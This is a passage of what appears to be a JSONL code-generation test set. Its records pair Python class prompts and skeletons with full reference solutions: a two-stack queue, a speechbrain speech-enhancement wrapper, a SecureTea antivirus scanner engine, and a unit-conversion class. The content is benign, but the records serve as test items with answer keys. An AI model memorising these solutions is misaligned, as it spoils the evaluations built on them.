self.s2.append(self.s1.pop())\n return self.s2.pop()\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n if self.s2:\n return self.s2[-1]\n return self.front\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n if not self.s1 and (not self.s2):\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "leet_code/232. 用栈实现队列.py", "source_repo": "muyisanshuiliang/python", "split": "test", "star_events_count": 0} {"blob_id": "0c1b699d18933ca76dcc0358803abd2a50a8c082", "bodies": ["feats = self.hparams.compute_stft(wavs)\nfeats = self.hparams.spectral_magnitude(feats)\nreturn torch.log1p(feats)", "noisy = noisy.to(self.device)\nnoisy_features = self.compute_features(noisy)\nif lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\nelse:\n mask = self.modules.enhance_model(noisy_features)\nenhanced = torch.mul(mask, noisy_features)\nreturn self.hparams.resynth(torch.expm1(enhanced), noisy)", "noisy = self.load_audio(filename)\nnoisy = noisy.to(self.device)\nbatch = noisy.unsqueeze(0)\nenhanced = self.enhance_batch(batch)\nif output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\nreturn enhanced.squeeze(0)"], "bodies_text": "<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "class_docstring": "A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)", "class_name": "SpectralMaskEnhancement", "detected_licenses": ["Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause", "LicenseRef-scancode-generic-cla", "LicenseRef-scancode-unknown-license-reference", "GPL-1.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... 
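The `MyQueue` record completed above is the classic queue-from-two-stacks construction: pushes land on `s1`, and pops drain `s1` into `s2` (reversing order) only when `s2` is empty, so each element moves between stacks at most once and every operation is amortized O(1); the cached `front` lets `peek` answer without draining. A compact restatement with a quick self-check:

# Queue from two stacks, amortized O(1) per operation.
class MyQueue:
    def __init__(self):
        self.s1, self.s2, self.front = [], [], None

    def push(self, x):
        if not self.s1:
            self.front = x        # remember the oldest element still in s1
        self.s1.append(x)

    def pop(self):
        if not self.s2:
            while self.s1:        # drain s1 into s2, reversing the order
                self.s2.append(self.s1.pop())
        return self.s2.pop()

    def peek(self):
        return self.s2[-1] if self.s2 else self.front

    def empty(self):
        return not self.s1 and not self.s2

q = MyQueue()
for v in (1, 2, 3):
    q.push(v)
assert q.pop() == 1 and q.peek() == 2 and not q.empty()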
) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000296", "length_bytes": 35100, "license_type": "permissive", "methods": [{"docstring": "Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.", "name": "compute_features", "signature": "def compute_features(self, wavs)"}, {"docstring": "Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.", "name": "enhance_batch", "signature": "def enhance_batch(self, noisy, lengths=None)"}, {"docstring": "Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.", "name": "enhance_file", "signature": "def enhance_file(self, filename, output_filename=None)"}], "n_methods": 3, "prompt": "Implement the Python class `SpectralMaskEnhancement` described below.\n\nClass description:\nA ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... 
) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\n\nMethod signatures and docstrings:\n- def compute_features(self, wavs): Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\n- def enhance_batch(self, noisy, lengths=None): Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\n- def enhance_file(self, filename, output_filename=None): Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.", "prompted_full_text": "Implement the Python class `SpectralMaskEnhancement` described below.\n\nClass description:\nA ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\n\nMethod signatures and docstrings:\n- def compute_features(self, wavs): Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\n- def enhance_batch(self, noisy, lengths=None): Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\n- def enhance_file(self, filename, output_filename=None): Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\n\n<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. 
Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "revision_id": "92acc188d3a0f634de58463b6676e70df83ef808", "skeleton": "<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... 
source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n", "source": "the_stack_v2_python_sparse", "source_path": "ACL_PyTorch/contrib/audio/tdnn/interfaces.py", "source_repo": "Ascend/ModelZoo-PyTorch", "split": "test", "star_events_count": 23} {"blob_id": "10516341a745c5ee11067a8e5b94ac40e3571304", "bodies": ["self.logger = AntiVirusLogger(__name__, debug=debug)\nif config_path is not None:\n self._CONFIG_PATH = config_path\nelse:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\nif file_list:\n self.file_list = file_list\nelse:\n self.file_list = []\nself.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.process_pool = []", "try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\nexcept KeyboardInterrupt:\n 
for process in self.process_pool:\n process.terminate()\n return True\nexcept Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True"], "bodies_text": "<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "class_docstring": "ScannerEngine class.", "class_name": "ScannerEngine", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. 
Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000297", "length_bytes": 4932, "license_type": "permissive", "methods": [{"docstring": "Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None", "name": "__init__", "signature": "def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None)"}, {"docstring": "Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None", "name": "start_scanner_engine", "signature": "def start_scanner_engine(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006495", "prompt": "Implement the Python class `ScannerEngine` described below.\n\nClass description:\nScannerEngine class.\n\nMethod signatures and docstrings:\n- def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None): Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\n- def start_scanner_engine(self): Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. 
Clam AV Scanner Engine Args: None Raises: None Returns: None", "prompted_full_text": "Implement the Python class `ScannerEngine` described below.\n\nClass description:\nScannerEngine class.\n\nMethod signatures and docstrings:\n- def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None): Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\n- def start_scanner_engine(self): Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\n\n<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "revision_id": "43dec187e5848b9ced8a6b4957b6e9028d4d43cd", "skeleton": "<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. 
Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and start scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. 
Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "securetea/lib/antivirus/scanner/scanner_engine.py", "source_repo": "rejahrehim/SecureTea-Project", "split": "test", "star_events_count": 1} {"blob_id": "22d16349dc78bfb3a087e493bcc0d4bb6269b084", "bodies": ["self.to_units = to_units\nself.kilo_prefix = kilo_prefix\nself._prefix_conversions = None\nself._bits_to_bytes = None\nself._bytes_to_bits = None\nself.bit_conversions = self.byte_conversions = len(to_units) // 2\nself.bit_units = to_units[:self.bit_conversions]\nself.byte_units = to_units[self.byte_conversions:]\nreturn", "if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\nreturn self._prefix_conversions", "if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\nreturn self._bits_to_bytes", "if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\nreturn self._bytes_to_bits", "if start_list is None:\n start_list = self.prefix_conversions[0]\nconverter_list = [[conversion_factor * conversion for conversion in start_list]]\nfor previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\nreturn converter_list", "for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\nfor index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\nreturn"], "bodies_text": "<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if 
